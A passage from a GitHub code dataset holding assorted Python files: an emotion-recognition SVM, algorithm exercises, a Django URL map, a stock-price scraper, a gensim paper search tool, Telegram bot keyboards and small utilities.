{1}'.format(len(training_labels),sys.getsizeof(training_labels)))\n\n    clf = SVC(kernel='linear', probability=True, tol=1e-3)\n    training_data = np.array(training_data)\n    training_labels = np.array(training_labels)\n\n    clf.fit(training_data,training_labels)\n    filename='F:\\Chaos\\EmotionRecognition\\Application\\model\\\\raw\\\\svmModel_full.sav'\n    pickle.dump(clf, open(filename, 'wb'))\n\n\n#for predicting with the svmModel\n\ndef predict_Particular():\n\n    filename='F:\\Chaos\\EmotionRecognition\\Application\\model\\\\raw\\\\svmModel_full.sav'\n    loaded_model = pickle.load(open(filename, 'rb'))\n\n\n    for emotion in new_emotions:\n\n        prediction_data = []\n        prediction_labels = []\n\n        for file in glob.glob(dir2+\"\\\\\"+emotion+\"\\*\"):\n\n            image = cv2.imread(file)\n            gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n            clahe_image = clahe.apply(gray)\n            landmarks_Vector=getLandmarks(clahe_image)\n            if landmarks_Vector:\n                prediction_data.append(landmarks_Vector)\n                prediction_labels.append(emotions.index(emotion))\n                print ('Expected {0}, Got {1}'.format(emotion,emotions[loaded_model.predict([landmarks_Vector])[0]]))\n\n\n        prediction_data = np.array(prediction_data)\n        prediction_labels = np.array(prediction_labels)\n        pred_score = loaded_model.score(prediction_data,prediction_labels)\n        print ('{0} Prediction Score {1}'.format(emotion,pred_score))\n\ndef get_Data(): # Function to return all data\n\n    training_data = []\n    training_labels = []\n    prediction_data = []\n    prediction_labels = []\n    original_test=[]\n\n    for emotion in new_emotions:\n\n        training, prediction = shuffle_files(emotion)\n        #Append data to training and prediction list, and generate labels 0-7\n        for item in training:\n            image = cv2.imread(item)\n            gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n            clahe_image = clahe.apply(gray)\n            landmarks_Vector=getLandmarks(clahe_image)\n            if landmarks_Vector:\n                training_data.append(landmarks_Vector)\n                training_labels.append(new_emotions.index(emotion))\n\n        for item in prediction:\n\n            image = cv2.imread(item)\n            gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n            clahe_image = clahe.apply(gray)\n            landmarks_Vector=getLandmarks(clahe_image)\n            if landmarks_Vector:\n                original_test.append(image)\n                prediction_data.append(landmarks_Vector)\n                prediction_labels.append(new_emotions.index(emotion))\n\n\n    return training_data, training_labels, prediction_data, prediction_labels,original_test\n\ndef applySVM():\n\n    clf = SVC(kernel='linear', probability=True, tol=1e-3)#, verbose = True) #Set the classifier as a support vector machine with linear kernel\n\n    accuracy_List=[]\n    highestScore = 0.0\n    final_prediction_label=[]\n    final_prediction_result=[]\n    final_prediction_image=[]\n\n    for i in range(0,10):\n\n        training_data, training_labels, prediction_data, prediction_labels,original_test = get_Data()\n        print ('Train data length ={0} , Test data length ={1}'.format(len(training_data),len(prediction_data)))\n\n        npar_train = np.array(training_data)\n        npar_trainlabels = np.array(training_labels)\n\n        clf.fit(npar_train,npar_trainlabels)\n        npar_pred=np.array(prediction_data)\n        pred_result=clf.predict(npar_pred)\n        pred_score = clf.score(npar_pred,prediction_labels)\n        if (pred_score > highestScore):\n            highestScore = pred_score\n            final_prediction_label=prediction_labels\n            final_prediction_result=pred_result\n            final_prediction_image=original_test\n        print ('Score {0}'.format(pred_score))\n        accuracy_List.append(pred_score)\n\n    print ('Mean-Accuracy {0}, Highest-Score {1}'.format(np.mean(accuracy_List),highestScore))\n    for i in 
range(len(final_prediction_result)):\n        cv2.imwrite(os.path.join(dest,new_emotions[final_prediction_label[i]],new_emotions[final_prediction_result[i]]+str(i)+'.jpg'),final_prediction_image[i])\n\n\napplySVM()\n#generateModel() #for generating the model\n#predict_Particular() #for predicting the model\n","repo_name":"shashank-13/Emotion-Recognition","sub_path":"Application/test_Landmark.py","file_name":"test_Landmark.py","file_ext":"py","file_size_in_byte":7586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44588480680","text":"class Solution:\n    def findRepeatedDnaSequences(self, s: str) -> List[str]:\n        current = s[:10]\n        seen_patterns = set([current])\n        output = set([])\n        for i in range(10,len(s)):\n            current = current[1:]+s[i]\n            if(current in seen_patterns):\n                output.add(current)\n            else:\n                seen_patterns.add(current)\n        return list(output)\n","repo_name":"Protype8/LeetCode","sub_path":"Arrays & Hashing/Repeated DNA Sequences - LeetCode.py","file_name":"Repeated DNA Sequences - LeetCode.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"38005622878","text":"T = int(input())\nTarr = []\nans = []\ncount = 0\nfor i in range(T):\n    Tarr.append(list(map(int, input().split())))\n    Tarr[i].append(list(map(int, input().split())))\n\nfor arr in Tarr:\n    Max = max(arr[2])\n    while arr[1] != -1:\n        if arr[2][0] == Max:\n            if arr[1] == 0:\n                ans.append(count + 1)\n                count = 0\n                arr[1] = -1\n            else:\n                arr[2].pop(0)\n                arr[1] -= 1\n                count += 1\n                Max = max(arr[2])\n        else:\n            if arr[1] == 0:\n                arr[2] = arr[2][1:] + arr[2][:1]\n                arr[1] = len(arr[2]) - 1\n            else:\n                arr[2] = arr[2][1:] + arr[2][:1]\n                arr[1] -= 1\n\nfor i in ans:\n    print(i)\n    ","repo_name":"witoru/many_things","sub_path":"boj/1966.py","file_name":"1966.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"36391558318","text":"import os\nfrom typing import Dict\n\nfrom scipy.interpolate import interp1d\n\n\ndef get_available_city_files():\n    \"\"\"\n    Retrieve the available files for the cities.\n    \"\"\"\n    filenames = os.listdir('src/assets')\n    filenames = list(filter(lambda f: f.endswith('.gif'), filenames))\n\n    def get_size(name: str):\n        name = name.split('_')[-1]\n        name = name.split('.')[0]\n\n        width, height = name.split('x')\n        return int(width), int(height)\n\n    return list(map(lambda f: ({\n        \"filename\": f,\n        \"label\": 'x'.join(list(map(str, get_size(f)))), \"width\": get_size(f)[0],\n        \"height\": get_size(f)[1]\n    }), filenames))\n\n\ndef parse_cities(path: str):\n    \"\"\"\n    Retrieve the data associated with the cities from the file at the path given in the parameters.\n\n    :param path: The path of the file to parse.\n    \"\"\"\n    with open(path, 'r') as file:\n        villes_coords = {}\n\n        for line in file:\n            name = line[:30].strip()\n            lat = line[30:36]\n            lng = line[53:63]\n\n            villes_coords[name] = {\"lat\": float(lat), \"lng\": float(lng)}\n\n        villes_coords[\"NorthWest\"] = ({\"lat\": 52, \"lng\": -5.5})\n        villes_coords[\"SouthEst\"] = ({\"lat\": 41, \"lng\": 10.5})\n\n    return villes_coords\n\n\ndef get_min_max_lat_lng(cities: Dict[str, Dict[str, float]]):\n    \"\"\"\n    Return the minimum and the maximum of the latitude and the longitude.\n\n    :param cities: The list of cities (dictionaries with lat and lng)\n    \"\"\"\n    lats = list(map(lambda c: c[\"lat\"], cities.values()))\n    lngs = list(map(lambda c: c[\"lng\"], 
cities.values()))\n\n    min_lat = min(lats)\n    max_lat = max(lats)\n    min_lng = min(lngs)\n    max_lng = max(lngs)\n\n    return min_lat, max_lat, min_lng, max_lng\n\n\ndef is_valid(cities, lat: float, lng: float) -> bool:\n    \"\"\"\n    Check that the coordinates passed as parameters are valid.\n\n    :param cities: The list of cities (dictionaries with lat and lng)\n    :param lat: The latitude of the coordinates.\n    :param lng: The longitude of the coordinates.\n    \"\"\"\n    min_lat, max_lat, min_lng, max_lng = get_min_max_lat_lng(cities)\n    return min_lat <= lat <= max_lat and min_lng <= lng <= max_lng\n\n\ndef get_cities_as_coordinates(cities, width: int, height: int) -> dict:\n    \"\"\"\n    Return the list of cities with the (x and y) coordinates mapped onto the map.\n\n    :param cities: The list of cities (dictionaries with lat and lng)\n    :param width: The width of the canvas.\n    :param height: The height of the canvas.\n    \"\"\"\n    min_lat, max_lat, min_lng, max_lng = get_min_max_lat_lng(cities)\n\n    scale_y = interp1d([min_lat, max_lat], [width, 0])\n    scale_x = interp1d([min_lng, max_lng], [0, height])\n\n    for city, coords in cities.items():\n        y = scale_y(coords[\"lat\"])\n        x = scale_x(coords[\"lng\"])\n\n        cities[city] = {\"x\": x, \"y\": y, **coords}\n\n    return cities\n","repo_name":"ctrl-plus-w/esaip-project-villes","sub_path":"src/utils/parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10021482938","text":"from django.urls import include, path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib.auth import views as auth_views\n\nfrom . import views\n\napp_name = 'games'\nurlpatterns = [\n    path('', views.IndexView, name='index'),\n    path('global/', views.GlobalIndexView, name='gindex'),\n    path('genre/<int:genre_id>/', views.GenreView, name='genre'),\n    path('genre/<int:genre_id>/<str:name>/', views.GenreView, name='genre'),\n    path('tag/<int:tag_id>/', views.GamesTaggedWithView, name='tag'),\n    path('tag/<int:tag_id>/<str:name>/', views.GamesTaggedWithView, name='tag'),\n    path('collection/<int:col_id>/', views.GamesInCollectionView, name='collection'),\n    path('collection/<int:col_id>/<str:name>/', views.GamesInCollectionView, name='collection'),\n    path('customlist/<int:list_id>/', views.GamesInCustomListView, name='customlist'),\n    path('platform/<int:pk>/', views.PlatformView.as_view(), name='platform'),\n    path('platform/<int:pk>/<str:name>/', views.PlatformView.as_view(), name='platform'),\n    path('game/<int:game_id>/', views.GameView, name='game'),\n    path('game/<int:game_id>/<str:name>/', views.GameView, name='game'),\n    path('game/<int:game_id>/<str:name>/<str:tab>/', views.GameView, name='game'),\n    path('user/<int:user_id>/', views.ProfileView, name='profile'),\n    path('user/<int:user_id>/<str:name>/', views.ProfileView, name='profile'),\n    path('user/<int:user_id>/<str:name>/<str:tab>/', views.ProfileView, name='profile'),\n    path('login/', auth_views.LoginView.as_view(template_name='games/login.html'), name='login'),\n    path('register/', views.register, name='register'),\n    path('gamelist/', views.GameListView, name='gamelist'),\n    path('gamelist/random', views.GameListRandomView, name='gamelistrandom'),\n    path('gamelist/export', views.GameListExportView, name='gamelistexport'),\n    path('gamelist/<str:edit_type>', views.GameListView, name='gamelist'),\n    path('gamelist/<str:edit_type>/<int:entry_id>', views.GameListView, name='gamelist'),\n    
path('browse/', views.BrowseView, name='browse'),\n    path('browse/collection/', views.BrowseCollectionView, name='browsecollection'),\n    path('browse/users/', views.BrowseUserView, name='browseusers'),\n    path('better/', views.BetterView, name='better'),\n    path('better/<str:better_type>/', views.BetterView, name='better'),\n    path('notifications/', views.NotificationsView, name='notifications'),\n    path('notifications/<str:action>/', views.NotificationsView, name='notifications'),\n    path('recommendations/', views.RecommendationsView, name='recommendations'),\n    path('recommendations/view/<int:user_id>', views.RecommendationsView, name='recommendations'),\n    path('recommendations/refresh/', views.RecommendationsRefreshView, name='recrefresh'),\n    path('game/ignore/<int:game_id>/', views.IgnoreGameView, name='ignore'),\n    path('game/addtag/<int:game_id>/', views.TagAdditionRequestView, name='tagreq'),\n    path('game/rateaspect/', views.RateAspectView, name='rateaspect'),\n    path('user/follow/<int:user_id>/', views.FollowUserView, name='follow'),\n    path('status/like/', views.LikeStatusView, name='likestatus'),\n    path('status/like/<int:status_id>/', views.LikeStatusView, name='likestatus'),\n    path('status/delete/<int:status_id>/', views.DeleteStatusView, name='deletestatus'),\n    path('settings/', views.SettingsView, name='settings'),\n    path('settings/avatar/', views.ChangeAvatarView, name='changeavatar'),\n    path('settings/ignoredtags/', views.ChangeIgnoredTagsView, name='changeignoredtags'),\n    path('settings/customlists/', views.ChangeCustomListsView, name='changecustomlists'),\n    path('settings/customlists/add', views.AddCustomListView, name='addcustomlist'),\n    path('settings/customlists/delete/<int:list_id>/', views.DeleteCustomListView, name='deletecustomlist'),\n    path('settings/customlists/edit/<int:list_id>/', views.EditCustomListView, name='editcustomlist'),\n    path('settings/platforms/', views.HidePlatformsView, name='hideplatforms'),\n] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"Hexadigital/mygamelist","sub_path":"mygamelist/games/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4123,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"70150270842","text":"# %%\n# import pandas_datareader.data as web\nfrom bs4 import BeautifulSoup as bs\n# import ssl\nimport pandas as pd\nimport requests as rs\nfrom selenium import webdriver\nfrom selenium.webdriver import Firefox\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver.chrome.options import Options\nimport time\nimport glob\nimport pyodbc\nimport os\n# from tkinter import *\n# import tkinter.filedialog\n# from tkinter import messagebox\n\n\n# %%\n\n# navegador = webdriver.Firefox(executable_path='./geckodriver.exe')\n# navegador.set_preference(\"browser.privatebrowsing.autostart\", True)\n# firefox_options = Options()\n# firefox_options.add_argument(\"--headless\")\n# navegador.maximize_window()\n# agente = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36'\n# headers = {'User-Agent': agente}\n\n\n# %%\n\nchrome_options = Options()\nchrome_options.add_argument(\"--headless\")\nnavegador = webdriver.Chrome(chrome_options=chrome_options)\nnavegador.maximize_window()\nagente = 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36'\nheaders = {'User-Agent': agente}\n\n\n# %%\n# goes through the requests and captures the 
html of each page\n# dataframe coming from the companies spreadsheet.\nempresas_df = pd.read_excel('EmpresasInfomoney.xlsx')\nurl = \"https://www.infomoney.com.br/cotacoes/\"\ntabelaResul = []\ncontador = 0\nwhile (contador < len(empresas_df)):\n    for empresa in empresas_df[\"Empresas\"]:\n        url_nv = ''.join([url, empresa, '/historico/'])\n        # print(empresa)\n        navegador.get(url_nv)\n        time.sleep(5)\n        conteudo = rs.get(url_nv, headers=headers)\n        time.sleep(3)\n        # finds the page element and stores the table data in memory.\n        tb_din = navegador.find_element_by_xpath(\n            '//*[@id=\"quotes_history\"]').get_attribute('outerHTML')\n        sigla_html = navegador.find_element_by_xpath(\n            '/html/body/div[4]/div/div[1]/div[1]/div/div[1]/h1')\n        # , index_col=\"DATA\" include after thousands to use the date as the index.\n        pd_html = pd.read_html(tb_din, decimal=',', thousands='.')\n        df = pd.DataFrame(pd_html[0])\n        df['EMPRESA'] = sigla_html.text\n        time.sleep(3)\n        tabelaResul.append(df.head(1))\n        contador += 1\n        time.sleep(3)\n\n\n# %%\n# \nurl_cxco11 = \"https://www.infomoney.com.br/cotacoes/fundos-imobiliarios-cxco11/\"\nEmpresa_cx = ''\nnavegador.get(url_cxco11)\n\ncx_fechamento = navegador.find_element_by_xpath(\n    '/html/body/main/section/div/div/div[1]/div[2]/div[1]/span[1]').get_attribute('outerHTML')\ncx_sigla_html = navegador.find_element_by_xpath(\n    '/html/body/main/section/div/div/div[1]/div[1]/div/h1').get_attribute('outerHTML')\ncx_fechamento_bs = bs(cx_fechamento, 'html.parser')\ncx_sigla = bs(cx_sigla_html, 'html.parser')\n\ncx_data_df = pd.DataFrame(tabelaResul[0])\ncx_data_df['DATA']\n\ncxco11_list1 = pd.Series(cx_data_df['DATA'])\ncxco11_list2 = pd.Series(float(cx_fechamento_bs.text.replace(\",\", \".\")), name='FECHAMENTO')\ncxco11_list3 = pd.Series(cx_sigla.text, name='EMPRESA')\n\ndf_cxco11 = pd.concat([cxco11_list1, cxco11_list2, cxco11_list3], axis=1)\n\ndf_cxco11.to_excel(f'acoesfiltradas/cxco1.xlsx',\n                   columns=['DATA', 'FECHAMENTO', 'EMPRESA'], index=False)\n\n\n# %%\ndef criar_plans_filtradas():\n    acoes_tratadas = []\n    for i in range(len(empresas_df)):\n        pdf = pd.DataFrame(tabelaResul[i].head(2), columns=None)\n        acoes_tratadas.append(pdf[['DATA', 'FECHAMENTO', 'EMPRESA']])\n        acoesfiltradas = pdf.to_excel(f'acoesfiltradas/acoesfiltradas{i}.xlsx', columns=[\n            'DATA', 'FECHAMENTO', 'EMPRESA'], index=False)\n\n\n# %%\ndados_historicos = pd.DataFrame()\n\n\ndef juntar_planilhas():\n    dados_historicos = pd.DataFrame()\n    dados = glob.glob('acoesfiltradas\\*.xlsx')\n    dados_historicos += dados_historicos\n    for i in dados:\n        tabela = pd.read_excel(i)\n        dados_historicos = pd.concat(\n            [dados_historicos, tabela], axis=0, ignore_index=True)\n    dados_historicos.to_excel('./acoesfiltradas.xlsx', index=False)\n\n\n# %%\n# prepara_sql = pd.read_excel('./acoesfiltradas.xlsx')\n\n# %%\ndef SQLInserirDados(TabelaRecebeDados):\n    prepara_sql = pd.read_excel('./acoesfiltradas.xlsx')\n    dados_historicos = prepara_sql\n    try:\n\n        cnxn = pyodbc.connect('Trusted_Connection=yes',\n                              driver='{SQL Server}',\n                              server='LEANDROPC\\SQLDEVELOPER2019',\n                              database='ACOESINFO')\n\n        cursor = cnxn.cursor()\n        # Insert Dataframe into SQL Server:\n        for index, row in dados_historicos.iterrows():\n            cursor.execute(\"INSERT INTO [ACOESINFO].[dbo].[ACOESINFOMONEY] ( [DATA],[FECHAMENTO],[EMPRESA]) values(?,?,?)\",\n                           row.DATA, row.FECHAMENTO, row.EMPRESA)\n\n        cnxn.commit()\n        print(\"Inserindo dados\")\n    except ConnectionError as e:\n        print(\"Erro de conexão: \", e)\n\n    finally:\n\n        cursor.close()\n        cnxn.close()\n\n\n# 
%%\ndef selectDatdos(consultar):\n\n    try:\n        connStr = pyodbc.connect('Trusted_Connection=yes',\n                                 driver='{SQL Server}',\n                                 server='LEANDROPC\\SQLDEVELOPER2019',\n                                 database='ACOESINFO')\n\n        saida = pd.read_sql(consultar, connStr)\n        print(\"consultando\")\n        return saida\n    except ConnectionError as e:\n        print(\"Erro de conexão: \", e)\n\n\n# %%\n\n\ncriar_plans_filtradas()\ntime.sleep(0.1)\njuntar_planilhas()\ntime.sleep(0.1)\nnavegador.quit()\n\n\n# %%\nSQLInserirDados('[ACOESINFO].[dbo].[ACOESINFOMONEY]')\ntime.sleep(0.1)\nselectDatdos(consultar=\"select * FROM [ACOESINFO].[dbo].[ACOESINFOMONEY]\")","repo_name":"leandromartins36/acoes_nv","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5809,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73723653239","text":"T = int(input())\n\nfor tc in range(1,T+1):\n    N = int(input())\n    li = []\n    for _ in range(N):\n        temp = list(map(int,input().split()))\n        temp = list(map(lambda x: x/100, temp))\n        li.append(temp)\n\n    res = 0\n\n    p = list(range(N))\n\n    stack = [[[x], li[0][x]] for x in p]\n\n    M = 0\n    while stack:\n        perm, prob= stack.pop()\n\n        if len(perm) == len(li):\n            if prob > M :\n                M = prob\n        else:\n            for i in p:\n                if i not in perm:\n                    if prob * li[len(perm)][i] <= M :\n                        continue\n                    else:\n                        stack.append((perm+[i], prob * li[len(perm)][i]))\n\n    print(f'#{tc}',end=' ')\n    print(\"{:.6f}\".format(M*100))","repo_name":"hhhhjjj11/TIL","sub_path":"알고시간2/3월30일/과제.py","file_name":"과제.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"11763096479","text":"@app.route(\"/quotes/<int:id>\", methods=['DELETE'])\ndef delete(id):\n    connection = get_db()\n    cursor = connection.cursor()\n    quote_db = cursor.fetchone()\n    cursor.execute(quote_db)\n    connection.commit()\n    quotes = []\n    keys = [\"id\", \"author\", \"text\"]\n    quote = dict(zip(keys, quote_db))\n    quotes.append(quote)\n    for quote in quotes:\n        if id == quote['id']:\n            quotes.remove(quote)\n            return f\"Quote with id {id} is deleted.\", 200\n    abort(404, f\"Указанного id= {id}, не существует\")","repo_name":"ArsTheProgammer/for_homeworks","sub_path":"delete_separate_file_hw.py","file_name":"delete_separate_file_hw.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"12276453390","text":"\"\"\"\nGiven a collection of numbers that might contain duplicates, return all possible unique permutations.\n\nExample:\n\nInput: [1,1,2]\nOutput:\n[\n [1,1,2],\n [1,2,1],\n [2,1,1]\n]\n\n\"\"\"\nimport collections\n\n\nclass Solution:\n    def permuteUnique(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[List[int]]\n        \"\"\"\n        def dfs(nums, cur, used, ret):\n            if len(cur)==len(nums):\n                ret.append(cur)\n                return\n            pre = None\n            for i in range(len(nums)):\n                if not used[i]:\n                    if pre is None or pre!=nums[i]:\n                        used[i] = True\n                        dfs(nums, cur+[nums[i]], used, ret)\n                        pre = nums[i]\n                        used[i] = False\n\n        nums.sort()\n        ret = []\n        if len(nums)==0:\n            return ret\n        dfs(nums, [], [False]*len(nums), ret)\n        return ret\n\n\nclass Solution2:\n    def permuteUnique(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: List[List[int]]\n        \"\"\"\n        def dfs(n, arr, cur, ret):\n            if len(cur)==n:\n                ret.append(cur)\n                return\n            for i in range(len(arr)):\n                if arr[i][1]:\n                    arr[i][1] -= 1\n                    dfs(n, arr, cur+[arr[i][0]],ret)\n                    arr[i][1] += 1\n\n        n = len(nums)\n        counter = collections.Counter(nums)\n        
arr = list(map(list,counter.items()))\n        ret = []\n        for i in range(len(arr)):\n            arr[i][1] -= 1\n            dfs(n, arr, [arr[i][0]],ret)\n            arr[i][1] += 1\n        return ret\n","repo_name":"ellinx/LC-python","sub_path":"PermutationsII.py","file_name":"PermutationsII.py","file_ext":"py","file_size_in_byte":1649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40632128126","text":"# Write your angular_dist function here.\nimport numpy as np\n\ndef angular_dist(ra1, dec1, ra2, dec2):\n    d1 = np.radians(dec1)\n    d2 = np.radians(dec2)\n    r1 = np.radians(ra1)\n    r2 = np.radians(ra2)\n    b = np.cos(d1)*np.cos(d2)*np.sin(np.abs(r1 - r2)/2)**2\n    a = np.sin(abs(d1 - d2)/2)*np.sin(abs(d1 - d2)/2)\n    d = 2*np.arcsin(np.sqrt(a + b))\n    return np.degrees(d)\n\n# You can use this to test your function.\n# Any code inside this `if` statement will be ignored by the automarker.\nif __name__ == '__main__':\n    # Run your function with the first example in the question.\n    print(angular_dist(21.07, 0.1, 21.15, 8.2))\n\n    # Run your function with the second example in the question\n    print(angular_dist(10.3, -3, 24.3, -29))\n\n","repo_name":"rugggg/astro_data","sub_path":"week2/angles.py","file_name":"angles.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"42670723037","text":"from gensim import corpora, models, similarities\nimport glob\nimport re\n\nfrom cStringIO import StringIO\nexpr = re.compile(\"([^\\w\\xe9-\\xf8'\\s])\", re.UNICODE)\n\nfolders = [\n    \"/home/mehdi/A Lire/info/papers/ML\"\n]\n\ndef to_words(fd):\n    lines = []\n    for line in fd.readlines():\n        line = line.decode(\"utf8\")\n        line = line[:-1]\n        line = expr.sub(r\" \\1 \", line)\n        line = line.lower()\n        line = line.split()\n        line = [word.strip() for word in line]\n        lines.append(line)\n    words = [word for line in lines for word in line]\n    return words\n\nclass MyCorpus(object):\n    def __init__(self, filenames):\n        self.filenames = filenames \n    def __iter__(self):\n        for filename in self.filenames:\n            fd = open(filename)\n            words = to_words(fd)\n            fd.close()\n            yield words\n\n\nimport os\nimport subprocess\nimport re\ndef findfiles(dir, pattern):\n    patternregex = re.compile(pattern, re.IGNORECASE)\n    for root, dirs, files in os.walk(dir):\n        for basename in files:\n            filename = os.path.join(root, basename)\n            if patternregex.search(filename):\n                yield filename\n\ndef generate_txt_all(folder):\n    for filename in findfiles(folder, \"\\.pdf$\"):\n        generate_txt(filename)\n\ndef generate_txt(filename):\n    subprocess.call([\"pdftotext\", filename], cwd=os.path.join(os.getenv(\"HOME\"), \".papers\"))\n\nif __name__ == \"__main__\":\n\n    import sys\n    action = sys.argv[1]\n    folder = os.path.join(os.getenv(\"HOME\"), \".papers\")\n    filenames = list(glob.glob(folder + \"/*.txt\"))\n    filenames = sorted(filenames)\n\n    if action == \"gentext\":\n        for folder in folders:\n            generate_txt_all(folder)\n    elif action == \"buildmodel\":\n        corpus = MyCorpus(filenames)\n        dictionary = corpora.Dictionary(corpus)\n        dictionary.save(folder + \"/dictionary\")\n        corpus = [dictionary.doc2bow(doc) for doc in corpus]\n        corpora.MmCorpus.serialize(os.path.join(folder, \"corpus\"), corpus)\n        corpus = corpora.MmCorpus(os.path.join(folder, \"corpus\"))\n        model = models.LdaModel(corpus, id2word=dictionary, num_topics=200)\n        index = similarities.MatrixSimilarity(model[corpus])\n        model.save(folder + \"/model\")\n        index.save(folder + \"/index\")\n    elif 
action == \"query\":\n corpus = corpora.MmCorpus(folder + \"/corpus\")\n model = models.LsiModel.load(folder + \"/model\")\n index = similarities.MatrixSimilarity.load(folder + \"/index\")\n dictionary = corpora.Dictionary.load(folder + \"/dictionary\")\n query = sys.argv[2]\n if len(sys.argv) >= 4:\n top = int(sys.argv[3])\n else:\n top = 1\n query = model[dictionary.doc2bow(to_words(StringIO(query)))]\n response = index[query]\n rank = sorted(range(len(corpus)), key=lambda k:response[k], reverse=True)\n\n rank_filenames = (map(lambda k:filenames[k], rank))\n response = rank_filenames[top - 1]\n print(response)\n for folder in folders:\n for filename in findfiles(folder, \"\\.pdf$\"):\n if(os.path.basename(filename).split(\".\")[0] == \n os.path.basename(response).split(\".\")[0]):\n subprocess.call([\"evince\", filename])\n break\n","repo_name":"mehdidc/fun","sub_path":"py/papers.py","file_name":"papers.py","file_ext":"py","file_size_in_byte":3333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74309039160","text":"from telebot import types\n\n\ndef main_keyboard():\n keyboard = types.ReplyKeyboardMarkup(True, True)\n keyboard.row('🗓️ Расписание/Мастер-классы')\n keyboard.row('🍽️ Питание', '🔔 Услуги')\n keyboard.row('❇ Акции и скидки', '🌐 Связь с нами')\n return keyboard\n\n\ndef food_keyboard():\n keyboard = types.ReplyKeyboardMarkup(True, True)\n keyboard.row('🍽️ Рестораны', '🍸 Бары')\n keyboard.row('🌭 Снек-бары', '🍨 Детям')\n keyboard.row('🔙 Назад')\n return keyboard\n\n\ndef schedule_keyboard():\n keyboard = types.ReplyKeyboardMarkup(True, True)\n keyboard.row('🎆 Вечерние мероприятия')\n keyboard.row('😎 Teen-club', '🥗 Кулинарный мастер-класс')\n keyboard.row('🎥 Cinema-academy', '🤸 Fitness-academy')\n keyboard.row('🔙 Назад')\n return keyboard\n\n\ndef contacts_keyboard():\n keyboard = types.InlineKeyboardMarkup()\n keyboard.row_width = 1\n keyboard.add(\n types.InlineKeyboardButton('🔗 Instagram', 'https://www.instagram.com/doville__animation/'),\n types.InlineKeyboardButton('🔗 ВКОНТАКТЕ', 'https://vk.com/dovilleanimation_club'),\n )\n return keyboard\n\n\ndef services_keyboard():\n keyboard = types.InlineKeyboardMarkup()\n keyboard.row_width = 2\n keyboard.add(\n types.InlineKeyboardButton('🛍️ Магазины', 'https://dovilleresort.ru/about/services/magazini/'),\n types.InlineKeyboardButton('💼 Консьерж', 'https://dovilleresort.ru/about/services/consierge/'),\n types.InlineKeyboardButton('🥘 Рум-сервис', 'https://dovilleresort.ru/about/services/room-service/'),\n types.InlineKeyboardButton('🅿️ Парковка', 'https://dovilleresort.ru/about/services/parking/'),\n )\n return keyboard\n\n\ndef teen_club_keyboard():\n keyboard = types.InlineKeyboardMarkup()\n keyboard.row_width = 1\n keyboard.add(\n types.InlineKeyboardButton('Перейти ➡️', 'https://vk.com/public204655046'),\n )\n return keyboard\n\n\ndef cook_masterclass_keyboard():\n keyboard = types.InlineKeyboardMarkup()\n keyboard.row_width = 1\n keyboard.add(\n types.InlineKeyboardButton('Перейти ➡️', 'https://www.instagram.com/stanislavkalinovskiy/'),\n )\n return keyboard\n\n\ndef fedorova_keyboard():\n keyboard = types.InlineKeyboardMarkup()\n keyboard.row_width = 1\n keyboard.add(\n types.InlineKeyboardButton('Принять участие ➡️',\n 'https://c.cloudpayments.ru/payments/7e8d475280974ced8aca998d76a93d60',\n callback_data='fedorova'),\n )\n return 
keyboard\n","repo_name":"igor-kushnarenko/telebot","sub_path":"scripts/keyboards.py","file_name":"keyboards.py","file_ext":"py","file_size_in_byte":2799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"30858925118","text":"import logging\n\nimport pandas\nfrom pandas import DataFrame\nimport re\n\nLOGGER = logging.getLogger()\n\nFILE_PATTERN = re.compile(r'.*(?P<eid>h\\d+)_(?P<tuid>.*)_(?P<ln>\\D*)_(?P<fn>\\D*).csv')\n\n\nclass Rubric:\n\n def __init__(self, file: str):\n self.__init_information(file)\n self.__init_csv(file)\n\n def __init_csv(self, file: str):\n try:\n self.__frame = pandas.read_csv(file, header=1, index_col='Kriterium')\n self.points = self.__frame.loc['Gesamt', 'Erzielt']\n except Exception as e:\n raise Exception(\"<{file}> could not be read.\")\n\n def __init_information(self, file_name: str, warn: bool = True) -> None:\n \"\"\"\n Sets the exercise id, the tu id, the last name and the first name given by the file name.\n :type warn: if a warning should be printed if the file name does not match the expected pattern\n :param file_name: the file name\n \"\"\"\n self.exercise_id = self.tu_id = self.last_name = self.first_name = None\n match = FILE_PATTERN.match(file_name)\n if not match:\n if warn:\n 